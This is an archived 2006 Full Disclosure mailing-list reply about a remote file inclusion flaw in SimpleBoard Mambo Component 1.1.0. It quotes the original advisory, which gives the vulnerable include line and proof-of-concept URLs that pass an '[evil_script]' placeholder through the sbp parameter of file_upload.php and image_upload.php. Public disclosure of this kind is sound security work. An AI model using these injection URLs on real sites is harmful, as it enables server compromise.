Full Disclosure mailing list archives
Re: SimpleBoard Mambo Component 1.1.0 Remote File Include
From: Häussler, Christian <Christian.Haeussler () huk-coburg de>
Date: Wed, 20 Sep 2006 07:25:19 +0200
Hello, the same problem is in the File image_upload.php: http://website.com/components/com_simpleboard/image_upload.php?sbp=[evil_script] Best Regards, Christian Haeussler -----Ursprüngliche Nachricht----- Von: stormhacker () hotmail com [mailto:stormhacker () hotmail com] Gesendet: Sonntag, 10. September 2006 00:56 An: bugtraq () securityfocus com Betreff: SimpleBoard Mambo Component 1.1.0 Remote File Include [W]orld [D]efacers Team ====================================== --------------------Summary---------------- eVuln ID: WD23 Vendor: SimpleBoard Mambo Component 1.1.0 Vendor's Web Site: mamboxchange.com/projects/simpleboard Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS (worlddefacers.de) -----------------Description--------------- require_once("$sbp/sb_helpers.php"); --------------PoC/Exploit---------------------- http://website.com/components/com_simpleboard/file_upload.php?sbp=[evil_script] --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: rUnViRuS (worlddefacers.de) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: SimpleBoard Mambo Component 1.1.0 Remote File Include Häussler , Christian (Sep 20)